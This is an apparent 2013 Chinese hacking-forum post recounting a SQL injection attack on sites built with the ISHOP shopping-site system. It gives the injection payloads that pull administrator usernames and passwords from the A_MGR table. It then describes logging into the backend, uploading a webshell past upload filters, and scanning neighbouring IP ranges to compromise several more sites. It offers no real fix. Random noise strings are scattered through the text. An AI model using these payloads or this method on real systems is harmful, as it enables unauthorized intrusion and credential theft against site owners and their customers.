中国网络渗透测试联盟
标题:
ISHOP商场建站系统注入漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:40
标题:
ISHOP商场建站系统注入漏洞
发现一个注入点
3 u' S T) u: n3 O1 o$ f1 B% z
http://www.xxx.com
/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
K% R9 H( @ }
) ?+ x- N8 U5 A5 ~! D1 ~. y" @
习惯性的加’having1=1--
+ M( p7 Y# ]& c$ X
7 e8 O# t4 ?, ]
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
’having 1=1—
" \9 D) ]6 f G/ Z! R8 y! D
& @1 h& Z" ?" u; |8 {
0
3 x- O; L) W% K1 w5 X
' p1 s3 r6 J( j3 d
爆出Diary_A.dl_Title(这时候很激动啊)
" m* h! R* O9 [& j9 {; Z! ]
( X _2 A4 r) D& ^9 a
那么继续
3 V+ e1 {4 x. D4 q u
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
’group by dl_Title having 1=1—
& ?; Y4 o: {9 L2 u- A) B
5 u' J* S2 c0 m- Y0 D* M1 \" y
继续,一直爆下去
- v( H& S3 r6 |8 M. Y
5 n; T6 @6 k6 }2 [
爆到几个字段和表段 但是没找到需要的管理用户的字段
% c9 r! L) h& f A
6 c9 V8 a n. z0 w9 \
蛋疼了 怎么办 然后去后台登陆页看源码
0 v: E: j1 c5 t @0 F
! F$ \) g$ O$ G7 a6 g
0
$ R. i4 x: n! I, K3 o" N8 | ]
; I) K$ ~. L u# n! M$ ]& O9 G2 Y
Input name= “ADUID”
4 u5 }5 |/ I! P( W; S2 T
Input name= “ADPWD”
8 Y/ }: k Q: t9 d1 g' p8 Q* |* O
6 R2 t) j# ^; |0 ^: V
很幸运 找到了字段那就继续
& j2 e# t* A8 r. u" c
找到之后开始爆用户
K( ?$ ^! Y0 S- l# T+ B: w" Z" H
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and
(select top 1 MGR_UID from A_MGR)>0—
$ q$ U+ d0 L6 d. x
爆密码
* f2 F/ ^- ~0 S2 I4 D2 y+ z& [3 A, ^" U
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and
(select top 1 MGR_PWD from A_MGR)>0—
" y, Q" i1 w# z% j8 o; }, ^ L
测试了下 这个注入点只能爆到文章哪里的表
8 z0 H; c' | n9 l7 w- } O. S
* [' g$ d2 v8 ?
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
. k$ E; b. F, N- J+ W' |! J
% D, ]# f5 g( b9 n
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
4 d! c- d+ C' j- W
! a7 ^& Z& s/ }0 ~4 r
473
0 O7 ]/ A% ~# x* ?4 ~3 d2 r1 s4 O! n
% e; k! I: @- n
进后台
' X q7 t+ d$ R7 C+ L7 [
5 S# Q# k4 k. z. o0 [& q0 Y: i
6 t( {- k. g$ w2 N1 P
发现几个上传点 有的地方不能上传 而且防止恶意代码
' A8 V9 [1 j& y) s; D# H# R/ g: H
* B1 \7 W: a" N
没办法 各种百度各种找大牛 找到一只好像可以突破的马
: z" e5 k3 w# Z. O
7 N0 f" o3 U; l% O. e+ {) Y( J$ ~
8 `. M; u; D3 K# a3 W
在系统管理那里直接上传 不过没有显示地址
7 W5 J" o/ a+ q- [* I. X1 ?
& Z8 e% l: ?2 Y* b1 o+ t" h
再上传一次 抓包 搞定OK
' w4 l, u. x; \% c: E( C
$ ~ A( g8 n: x
( t' M& G% d; m) I" r$ Q' P* g
5 T) C& {; q% J( m
472
6 e; u6 B8 Q; a# D3 [: C
. m8 `1 f- Y c- T \2 E) t
晚上不行了 去睡觉。。。
$ i g- y+ q* \6 M7 a: Z
第二天刚起床 闲的没事做继续日站吧
B. v" _+ z" a& H; u- C O
5 c3 C+ @: C$ i6 \6 |8 b
找个站 就把这个站的旁c扫了下
5 b: R1 u0 n+ m( C% l
% M# L; R# V& H+ [# i" Z
发现c段也有一个购物站 ,然后还和这个站的模板差不多
+ x3 C7 [: d( b- X& {% U4 r. I
' i1 a K N5 s4 i' @
就找到会员登录口测试
}: x: V7 S7 q$ t! ]) F
6 r0 V& O+ K7 `
'and (select top 1 MGR_UID from A_MGR)>0—
5 v( i. }' L' O8 D d6 E( N
果断爆到了 这时候我很激动 通杀
4 i$ ~8 ~# y* b
$ a5 g# s9 q. z. P4 ?& [9 d
再次翻c段
$ P( W! ^: B% k( G+ ?, J
* o7 Q7 _& H8 C. J* s' q7 y
翻出几个站 都成功拿下
+ J5 D3 X* A U" \1 d
' S# d6 G/ j4 i3 Q
/ V n2 B7 E7 C9 H+ E
( m4 y- a3 ~. c* w% P. d1 \
修复方案:
' |- G1 H. L7 O3 O1 N; ~7 _. K
他们比我专业
/ m3 w& y$ f7 D" I0 N
; H+ n7 `2 Y6 K# x; H
" q' r2 Z! D6 K1 [. `
1 t1 b6 {+ A( n7 m
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2